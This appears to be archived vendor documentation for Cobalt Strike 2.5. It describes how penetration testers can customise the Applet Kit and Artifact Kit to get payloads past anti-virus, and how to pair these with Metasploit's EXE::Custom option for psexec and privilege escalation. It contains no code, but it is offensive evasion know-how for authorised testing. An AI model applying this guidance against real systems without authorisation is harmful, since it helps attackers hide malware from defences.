Notice: There is a serious security flaw in Cobalt Strike 3.5 and below (2.x is deprecated and assumed affected as well). Please read the advisory for more details.


Notice: This content is for Cobalt Strike 2.5. It's kept here for users working with the old version. The homepage for the latest Cobalt Strike is at

Anti-virus Evasion

Anti-virus evasion is a problem every penetration tester has to deal with. Any file that touches disk or loads in a browser is an opportunity for anti-virus to catch you.

To get past anti-virus, Cobalt Strike re-implements several key Java attacks. Cobalt Strike also uses a proprietary process to generate Windows executables. Unmodified, these artifacts get past many anti-virus products. Evasion is not guaranteed though.

If a Cobalt Strike Artifact does not get past an anti-virus product--you have the option to modify it and make Cobalt Strike use your modified artifact. Source code to Cobalt Strike's proprietary artifacts is available, to licensed users, in the Cobalt Strike Arsenal. The Arsenal contains the Applet Kit and Artifact Kit.

The Applet Kit is source code to Cobalt Strike's Java Injector, the Java Signed Applet attack, and Smart Applet attacks. You may modify the injector payload, sign the applet attack with your code signing certificate, or add new exploits to the smart applet attack. The supplied Cortana script integrates your modifications into the auto-exploit server and the Java attacks under the Attacks -> Web Drive-by menu.

The Power Applet is an alternate implementation of Cobalt Strike's Applet Attacks. This applet uses PowerShell to inject a Cobalt Strike payload into memory. Use the supplied Cortana script to make Cobalt Strike use this Applet Kit over the standard one.

The Artifact Kit is a source code framework to build executables that smuggle payloads past anti-virus products. Cobalt Strike uses the Artifact Kit to produce executables for features located in the Attacks menu. The Artifact Kit ships with three evasion techniques plus a template that you may use to build a new technique. Each technique includes a Cortana script to make Cobalt Strike use it over the default.

Licensed Cobalt Strike users may access the arsenal through Help -> Arsenal.

Metasploit Framework Considerations

When you use a Metasploit® Framework exploit or attack--know that the Metasploit® Framework's artifacts are well understood by most anti-virus products and they will get caught.

You should always use Cobalt Strike's Java Attacks over the Metasploit® Framework's built-in Java attacks. If a Metasploit® Framework module generates an executable--you should specify an Artifact Kit executable to get past anti-virus.

Metasploit® Framework modules that generate an executable usually accept an EXE::Custom option. Use Attacks -> Packages -> Windows EXE to generate the right type of executable for the module. Set the EXE::Custom option to point to it. Many privilege escalation exploits (post/windows/local/* in the Metasploit® Framework) accept custom executables.

Cobalt Strike will generate an Artifact Kit Windows Service Executable when you use Cobalt Strike's dialogs for lateral movement (e.g., [host] -> Login -> psexec). If you launch the Metasploit® Framework's psexec or current_user_psexec modules through the module browser or console you will need to set EXE::Custom.